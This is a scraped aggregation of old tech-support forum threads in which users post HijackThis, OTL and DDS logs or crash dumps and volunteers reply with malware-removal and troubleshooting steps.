Thanks!! I was making a backup copy of My Dvd and it was going to a tempory file "C:/Docume~/HiComputer/locale~1/Temp"

Well was i was burning it couldn't burn successfully and gave me a error message so try to do it again.. Same message.. BUT the thing was I had like 4 or 5 gbs of Hard Drive space before this and Now it is all gone!! I think in the middle of the unsuccessful burning it didn't delete those files.. Where Can i locate this File so i can delete it? I try to look in the C: drive for that name but couldn't find it..
Thanks for your help!!
 

A:Can someone help me find my "Docume" file so i can delete the temp files...

9 more replies
Answer Match 40.74%

I have been working with Mark in the Malware forum. After running every reccomended scan possible, I was only successful in generating an OT report. He asked that I post it over here for further assistance. For a complete discription of my issues, please see my post at: http://www.bleepingcomputer.com/forums/t/257859/removing-protection-system-a-rogue-anti-spyware-program/Thanks! I'll be on stand-by, Shawn ---------------------OTL logfile created on: 9/19/2009 1:55:36 PM - Run 1OTL by OldTimer - Version 3.0.14.0 Folder = C:\Documents and Settings\Administrator\DesktopWindows XP Media Center Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstationInternet Explorer (Version = 8.0.6001.18702)Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy511.29 Mb Total Physical Memory | 232.24 Mb Available Physical Memory | 45.42% Memory free1.27 Gb Paging File | 0.21 Gb Available in Paging File | 16.26% Paging File freePaging file location(s): C:\pagefile.sys 0 0 [binary data]%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program FilesDrive C: | 232.88 Gb Total Space | 10.48 Gb Free Space | 4.50% Space Free | Partition Type: NTFSD: Drive not present or media not loadedE: Drive not present or media not loadedF: Drive not present or media not loadedG: Drive not present or media not loadedH: Drive not present or media not loadedI: Drive not present or media not loadedComputer Name: DIGITALDREAMCurrent User Name: AdministratorLogge... Read more

A:Interpret OT log results?

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 40.74%

Hi, I have a LENOVO 300 V100 laptopI just reformated my hard drive after experiencing bizarre happenings such as devices installed that I did not install, system setting changes, and programs trying to gain access via Comodo firewall, which I don't know. As well as networks created out of nowhere which I recently noticed which I cannot get rid of because it re-creates itself soon after I delete. Now my system is supposed to be clean but I am having the same problems starting up again. (1) BLUETOOTH DEVICES ARE AGAIN RECOGNIZED AND I HAVE NO BLUETOOTH CONNECTED. In fact, before my problems started, I disabled bluetooth because I don't use it. And now I cannot delete, or disable it. (2) Omnipass has a user already registered. I don't know how this could be when i did not go through the enrollment process after I went through the Rescue and Recovery process. And any past passwords turn up as "password error" so a user is registered as "Owner". I UNINSTALLED OMNIPASS because I could not gain admin. access to the program.CAN ANYONE OFFER ME SOME ADVICE ON WHAT TO DO?? I think I am being hacked via Bluetooth and I don't have much knowledge on this hardware.Please help me,Lynne Logfile of Trend Micro HijackThis v2.0.2Scan saved at 12:13:16 PM, on 7/25/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)Boot mode: NormalRunning processes:C:WINDOWSSystem32smss.exeC:WINDOWSsystem32winlogon.exeC:WINDOWSsystem32ser... Read more

A:CAN SOMEONE PLEASE INTERPRET MY HIJACK THIS LOG???

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 40.74%

I have read some posts in various discussion groups about using Windbg, or some similar spelling. It seems to involve command line use. If there were a user-friendly utility that did most of the work for me, and was known by experienced users to be good and reliable, and friendly to those who are not Windows programmers, I would spend a few bucks to try it. I have just done a search in this forum for my handle, and I do not think that I have posted this query previously, but inform me if I am mistaken.

A certain app, Videowave in the RoxioCreator 2010 program, hangs with a grayed out screen and a message, presumably from Windows, that it has stopped working and that Windows is searching for a solution. Running "perfmon /rel" shows many such events, with summaries such as "stopped working and was closed"
Windows never reports that a solution was found. In ...\Appdata\Local\CrashDump I find several dmp files. Most are large, such as 19 million bytes, but one is only 876kb long.
When I change the suffix of this short file from DMP to TXT, and open it in Wordpad, I find some "English" but nearly all is hexadecimal displayed as extended ascii, or so it seems.

I see references to debugging tools from MS, in the SDK. Well, I am not a Windows programmer, and I am not trying to debug an app. I am trying to get a clue as to why an app hangs, so that I can try to get help from the manufacturer of the hanging app, in this case VideoWave12.exe. I have post... Read more

A:How interpret DMP files?

  
Quote: Originally Posted by highmeadowhiker


I have read some posts in various discussion groups about using Windbg, or some similar spelling. It seems to involve command line use. If there were a user-friendly utility that did most of the work for me, and was known by experienced users to be good and reliable, and friendly to those who are not Windows programmers, I would spend a few bucks to try it. I have just done a search in this forum for my handle, and I do not think that I have posted this query previously, but inform me if I am mistaken.

A certain app, Videowave in the RoxioCreator 2010 program, hangs with a grayed out screen and a message, presumably from Windows, that it has stopped working and that Windows is searching for a solution. Running "perfmon /rel" shows many such events, with summaries such as "stopped working and was closed"
Windows never reports that a solution was found. In ...\Appdata\Local\CrashDump I find several dmp files. Most are large, such as 19 million bytes, but one is only 876kb long.
When I change the suffix of this short file from DMP to TXT, and open it in Wordpad, I find some "English" but nearly all is hexadecimal displayed as extended ascii, or so it seems.

I see references to debugging tools from MS, in the SDK. Well, I am not a Windows programmer, and I am not trying to debug an app. I am trying to get a clue as to why an app hangs, so that I can try to get help fr... Read more

2 more replies
Answer Match 40.74%

Can someone please look at my hijackthis log, and tell me what to remove?

A:Interpret My Hijackthis Log

Hi,Please do not attach your log, but copy and paste it in the thread instead.I see you have Viewpoint installed...Viewpoint Manager is considered as foistware instead of malware since it is installed without users approval but doesn't spy or do anything "bad". This will change from what we know in 2006 read this article: http://www.clickz.com/news/article.php/3561546I suggest you remove the program now. Go to Start > Settings > Control Panel > Add/Remove Programs and remove the following programs if present.ViewpointViewpoint ManagerViewpoint Media PlayerThen, * Please download Malwarebytes' Anti-Malware from Here or HereDouble Click mbam-setup.exe to install the application.Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.If an update is found, it will download and install the latest version.Once the program has loaded, select "Perform Quick Scan", then click Scan.The scan may take some time to finish,so please be patient.When the scan is complete, click OK, then Show Results to view the results.Make sure that everything is checked, and click Remove Selected.When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.Copy&Paste the entire report in your next reply along with a fresh HijackThis log.Extra Note:If MBA... Read more

10 more replies
Answer Match 40.74%

Hi. Could you please look at this log? When I was going through the steps before running HijackThis, I saw a reference for the Zlob trojan, I think in my Adaware, but I'm not sure. Thanks.Anyway, here's my log:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 4:09:32 PM, on 12/27/2007Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Windows Defender\MsMpEng.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\System32\wltrysvc.exeC:\WINDOWS\System32\bcmwltry.exeC:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exeC:\WINDOWS\system32\basfipm.exeC:\WINDOWS\system32\cisvc.exeC:\Program Files\Cisco Systems\VPN Client\cvpnd.exeC:\Program Files\Symantec AntiVirus\DefWatch.exeC... Read more

A:Please Interpret Hijackthis Log

Welcome to the BleepingComputer HijackThis Logs and Analysis forum Mr. RJMy name is Richie and i'll be helping you to fix your problems.If you have previously downloaded ComboFix,please delete that version now.WarningYou should NOT use Combofix unless you have been instructed to do so by a Malware Removal Expert. It is intended by its creator to be used under the guidance and supervision of an expert,not for private use. Using this tool incorrectly could render your system/pc inoperable.Now download Combofix and save to your desktop:Note It is important that it is saved directly to your desktop Close any open browsers.Double click on combofix.exe and follow the prompts. When it's finished it will produce a log. Post the entire contents of C:\ComboFix.txt into your next reply. Note Do not mouseclick combofix's window while it's running. That may cause the program to freeze/hang. Do NOT post the ComboFix-quarantined-files.txt unless I ask.NoteIn case your Antivirus or any other realtime scanner is displaying an alert after you downloaded Combofix or while you use Combofix,please disable your scanner and redownload Combofix again.Some scanners may see some combofix related components as suspicious and block or delete them while there's nothing wrong with them.Also post a new Hijackthis log please.

5 more replies
Answer Match 40.74%

Everytime I boot up I get this stupid about blank and their own homepage. I have reset the homepage to netscape.com under Tools-Internet OPtions-Set home page but it always reverts back to the about blank when I reboot. I ran cwshredder, lava adware, and spybot. When I ran Hijack this, I removed several items in the R1 Category and the one that states about blank. They come back upon reboot. Help very appreciated. Dennis

Logfile of HijackThis v1.97.7
Scan saved at 8:05:32 PM, on 6/23/04
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\ZONELABS\VSMON.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\NAVAPW32.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\PROGRAM FILES\ZONE LABS\ZONEALARM\ZLCLIENT.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\WEBWASHER\WWASHER.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\MY DOCUMENTS\HJT\HIJACKTHIS.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\WINDOWS\TEMP\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\WINDOWS\TEMP\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\WINDOWS\TEMP\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\WIND... Read more

A:PLease Interpret this Hijack log

9 more replies
Answer Match 40.74%

keypad suddenly stopped working - please euse the issing letters hopefully you are still able to read this below is y hijak this file anything look suspiious/ Running processes:C:\WINDOWS\system32\HPZipm12.exeC:\WINDOWS\system32\wscntfy.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\hkcmd.exeC:\WINDOWS\system32\igfxpers.exeC:\Program Files\Synaptics\SynTP\SynTPEnh.exeC:\WINDOWS\system32\WLTRAY.exeC:\WINDOWS\system32\igfxsrvc.exeC:\Program Files\Dell\Media Experience\PCMService.exeC:\Program Files\Dell\Media Experience\DMXLauncher.exeC:\Program Files\Dell\QuickSet\quickset.exeC:\Program Files\Creative\Mixer\CTSVolFE.exeC:\WINDOWS\System32\DLA\DLACTRLW.EXEC:\WINDOWS\stsystra.exeC:\Program Files\Google\Gmail Notifier\gnotify.exeC:\Program Files\Trend Micro\Internet Security 14\pccguide.exeC:\Program Files\Windows Defender\MSASCui.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\NetWaiting\netWaiting.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Trend Micro\HijackThis\HijackThis... Read more

A:please interpret y log file

Hello , And to the Bleeping Computer Malware Removal Forum. My name is Elise and I'll be glad to help you with your computer problems.I will be working on your malware issues, this may or may not solve other issues you may have with your machine.Please note that whatever repairs we make, are for fixing your computer problems only and by no means should be used on another computer.You may want to keep the link to this topic in your favorites. Alternatively, you can click the button at the top bar of this topic and Track this Topic, where you can choose email notifications. The topics you are tracking are shown here.-----------------------------------------------------------If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explanation about the tool. No inp... Read more

2 more replies
Answer Match 40.74%

Below is my hijack log. Can anybody help me with it? Thanks.

Logfile of HijackThis v1.98.2
Scan saved at 12:13:31 AM, on 12/12/2004
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PccGuide.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\msiexec.exe
C:\Documents and Settings\Sam\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://login.yahoo.com/config/mail?.intl=ca
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\windows\googletoolbar.dll
O2 - BHO: (no ... Read more

A:Please Interpret Hijack Log

Thanks. I deleted the line.

Sam.
 

3 more replies
Answer Match 40.74%

I don't know what is wrong with my PC, but it has been getting progressively slower. I am not as computer illiterate as the average user, but I'm definitely still learning. I have Norton Antivirus, but it only seems to work to a certain degree because when I run scans it comes up clean. I know it's not a hardware issue because of the way it behaves. ex #1: I opened my computer about an hour ago and clicked on my user icon and the screen turned solid purple for about 30 seconds while it decided to boot up. It then told me it recovered from an unexpected shut down. That is a new development. ex. #2: I just tried to open a Word document I've had for a long ass time and an error came up saying it didn't exist. It opened on the second try, though. Below is my HijackThis log. PLEASE, PLEASE HELP!!!!!!!Logfile of Trend Micro HijackThis v2.0.2Scan saved at 8:58:44 PM, on 2/10/2010Platform: Windows Vista (WinNT 6.00.1904)MSIE: Internet Explorer v7.00 (7.00.6000.16982)Boot mode: NormalRunning processes:C:\Windows\system32\Dwm.exeC:\Windows\Explorer.EXEC:\Windows\system32\taskeng.exeC:\Program Files\Norton 360\Engine\3.8.0.41\ccSvcHst.exeC:\Program Files\Synaptics\SynTP\SynTPEnh.exeC:\Windows\OEM02Mon.exeC:\Program Files\Sigmatel\C-Major Audio\WDM\sttray.exeC:\Windows\WindowsMobile\wmdc.exeC:\Program ... Read more

A:Help me interpret my hijackthis log, please!

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.[We need to create an OTL ReportPlease download OTL from one of the following mirrors:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.In the custom scan box paste the following:CODEnetsvcsmsconfigsafebootminimalsafebootnetworkactivexdrivers32%systemroot%&#... Read more

2 more replies
Answer Match 40.74%

Can someone tell me where to find the manual with the explanation how to interpret the logs of ComboFix. Something more detailed of How to use ComboFix.Thanks

A:How To Interpret The Log Of Combofix ?

may one ask if you have as yet RUN the combofix? as if you have not yet done so DO NOT unless instructed to do so by a trained malware expert

if you have run the program ; who requested you run it and why did you run it ?

one presumes you have read the combofix disclaimer?

14 more replies
Answer Match 40.74%

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

A:Interpret Combofix Log

Here the DDS Report and GMER.LOG follow:DDS (Ver_10-03-17.01) - NTFSx86 Run by Laptop home at 15:45:26.59 on Fri 06/18/2010Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_12Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2038.1359 [GMT -4:00]AV: Norton Internet Security *On-access scanning enabled* (Updated) {E10A9785-9598-4754-B552-92431C1C35F8}FW: Norton Internet Security *enabled* {7C21A4C9-F61F-4AC4-B722-A6E19C16F220}============== Running Processes ===============C:\WINDOWS\system32\svchost -k DcomLaunchsvchost.exeC:\WINDOWS\System32\svchost.exe -k netsvcssvchost.exesvchost.exeC:\WINDOWS\System32\WLTRYSVC.EXEC:\WINDOWS\System32\bcmwltry.exeC:\WINDOWS\system32\spoolsv.exesvchost.exeC:\WINDOWS\system32\dlcxcoms.exeC:\Program Files\Seagate\SeagateManager\Sync\FreeAgentService.exeC:\Program Files\Google\Update\GoogleUpdate.exeC:\Program Files\Google\Update\1.2.183.23\GoogleCrashHandler.exeC:\Program Files\Common Files\Intuit\Update Service\IntuitUpdateService.exeC:\Program Files\Java\jre6\bin\jqs.exeC:\Program Files\Norton Internet Security\Engine\17.7.0.12\ccSvcHst.exeC:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exeC:\WINDOWS\system32\svchost.exe -k img... Read more

10 more replies
Answer Match 40.74%

I was surfing on several tabs on IE8 when the PC froze. Symptoms of this before it happens will be the PC running heavily out of a sudden with noise as if there is a motor engine revving up and then it will hang. Can someone kindly help me ID what was causing it? Attached minidump file below and thanks in advance for the help.

CPU: P4 3.06
Video: ATI HD3850 agp
2GB memory
OS: W7 Ultimate 32bit

additional info: no overclocking, ran memtest86 for 24hrs with no errors

A:Please help to interpret this BSOD

Hello and Welcome to SF !

We need the complete logs Blue Screen of Death (BSOD) Posting Instructions

Based on the crash dump you attached it's pointing to Windows Kernel which may not be the problem. Lets start with basics

Run a Hardware Diagnostic !! ? Captain Debugger follow this thread

Run SFC /SCANNOW Command - System File Checker

You have sptd.sys which is notorious for BSOD. Use this article and remove the driver DuplexSecure - FAQ

Update the following Drivers:


Code:
smwdm.sys Mon Mar 28 19:49:36 2005
LVUSBSta.sys Sat May 12 05:10:49 2007
e100b325.sys Sat Nov 17 00:23:32 2007
Use this guide for more help Driver Troubleshooting !! ? Captain Debugger

Bugcheck:


Code:
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003. This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 82549343, The address that the exception occurred at
Arg... Read more

1 more replies
Answer Match 40.74%

I very rarely get BSODs, but when I do, how do I interpret the error messages? How can I use them to diagnose the problem?

A:How to interpret BSOD

they usually give you a bugcheck code in hexadecimal which you can google for.

also, analyzing the minidumps will give you information about it.

9 more replies
Answer Match 40.74%

what do i "fix" and what do i leave alone???? i was directed to do hijack this after a run in with a pretend microsoft program, think smart....

thank u much
~L
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 8:21:02 AM, on 10/31/2010
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.17055)
Boot mode: Safe mode with network support

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\Program Files\Spyware Doctor\pctsTray.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Documents and Settings\Laura\Local Settings\Temporary Internet Files\Content.IE5\YDD4R1Y9\HijackThis[1].exe
C:\... Read more

A:Hijack this..please help me interpret what to do with this...

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the ... Read more

2 more replies
Answer Match 40.74%

I read this article for hijack This!, and it looked like a good idea for security purposes, but I don['t know how to interpret it..can anyone help this poor Newbie?

Logfile of HijackThis v1.96.4
Scan saved at 11:03:45 PM, on 9/4/2003
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Iomega\System32\ActivityDisk.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\PROGRA~1\mcafee.com\PERSON~1\MPFSERVICE.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\Speed Disk\nopdb.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\McAfee.com\VSO\mcshield.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Logitech\iTouch\iTouch.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\WINDOWS\GWMDMMSG.exe
C:\Program Files\Iomega HotBurn\Autolaunch.exe
C:\Program Files\Common Files\Real\Update_OB\evntsvc.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\PROGRA~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Support.com\bin\tgcmd.exe
C:\Program Files\Common Files\Logitech\QCDriver\LVCOMS.EXE
C:\Program Files\DIGStream\digstream.exe
C:\Program Files\Messenger Plus! 2\MsgPlus.exe
C:\PROGRA... Read more

A:Can someone help me interpret this from Hijack This!

Looks pretty clean to me, you can run Spybot Search & Destroy if you think there might be spyware on your system..
 

2 more replies
Answer Match 40.74%

Could one of you "Knowledgable Folks" please tell me what to do with this. Many thanks, Mike Allen, Welland, Canada.Logfile of HijackThis v1.99.0Scan saved at 2:35:05 PM, on 1/11/2005Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\System32\Ati2evxx.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\svchost.exec:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exeC:\Program Files\Common Files\Symantec Shared\ccProxy.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\Program Files\Norton Internet Security\Norton AntiVirus\navapsv... Read more

A:Hijack This: please help interpret

Log looks ok to me. What problems are you having?

2 more replies
Answer Match 40.74%

Hi: this query is for mainly my work Dell laptop, but must help anyone out there with a similar query. When my laptop has finished booting and I'm logged in, and it has loaded all the usual important startup stuff - Weather Channel, Palm HotSync, IM Client the CTRL-ALT-Delete / Performance graph shows 334Mb against PF usage (Paging File?) and Total Physical Memory as 523496Kb (512Mb). When I start up the usual office stuff I need to do my job with: Microsoft LookOut, IE, and some job specific applications, the PF Usage has grown to nearly 500Mb. After a few more apps the PF exceeds the Physical - I've seen it at 900Mb. Does this say that my usage is nearly double the physical install RAM - and it swapping or paging all the time, with the implied performance hit that will make? If so I may have grounds for getting it upgraded...
I remember my first home computer, a Sinclair Spectrum: http://en.wikipedia.org/wiki/Sinclair_ZX80 which had 1Kb of RAM - and now half a Gb is not enough - *SIGH*...
 

A:How do I interpret my RAM utilsation?

my understanding is you have it right

have a look at the startups running - they use memory and most are not needed

Start
run
msconfig
startup tab

compare with this website
http://www.pacs-portal.co.uk/startup_index.htm

scroll down tothis section - where you can open the list of possible startups and if needed
All items - on-line database displaying all programs, recommendations and descriptions

Full-list ZIP - off-line page showing all items in one table - also includes a search facility. Includes a cascading style sheet (startups.css) that allows the page to be displayed the same off-line as the on-line version. Extract all files to the same directory

